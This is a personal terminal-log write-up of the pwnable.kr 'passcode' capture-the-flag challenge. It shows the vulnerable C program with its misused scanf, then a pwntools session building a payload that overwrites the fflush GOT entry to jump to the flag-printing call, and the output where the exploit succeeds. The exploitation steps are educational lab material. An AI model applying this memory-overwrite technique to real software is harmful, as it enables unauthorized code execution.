passcode -wp
chen@ubuntu:~$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password: 
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \ 
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    / 
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \ 
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
                                                                     
- Site admin : daehee87@gatech.edu
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
You have mail.
Last login: Tue Apr  7 09:45:09 2020 from 183.197.84.69
passcode@pwnable:~$ cat passcode.c
#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}




//wp:
chen@ubuntu:~$ scp -p 2222 getans.py passcode@pwnable.kr:/tmp
ssh: connect to host pwnable.kr port 22: Connection refused
lost connection
chen@ubuntu:~$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password: 
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \ 
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    / 
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \ 
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
                                                                     
- Site admin : daehee87@gatech.edu
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
You have new mail.
Last login: Thu Apr  9 10:47:14 2020 from 183.197.76.55
passcode@pwnable:~$  python
Python 2.7.12 (default, Nov 12 2018, 14:36:49) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> payload = 'c'*96+'\x00\xa0\x04\x08'+'\n'+'134514147\n'
>>>  e = process('./passcode')
  File "<stdin>", line 1
    e = process('./passcode')
    ^
IndentationError: unexpected indent
>>>  e = process('./passcode')
  File "<stdin>", line 1
    e = process('./passcode')
    ^
IndentationError: unexpected indent
>>> e = process('./passcode')
[x] Starting local process './passcode'
[+] Starting local process './passcode': pid 158528
>>> e.sendline(payload)
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>>  e.recvline()
  File "<stdin>", line 1
    e.recvline()
    ^
IndentationError: unexpected indent
>>> e.interactive()
[*] Switching to interactive mode
[*] Process './passcode' stopped with exit code 0 (pid 158528)
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)
[*] Got EOF while reading in interactive
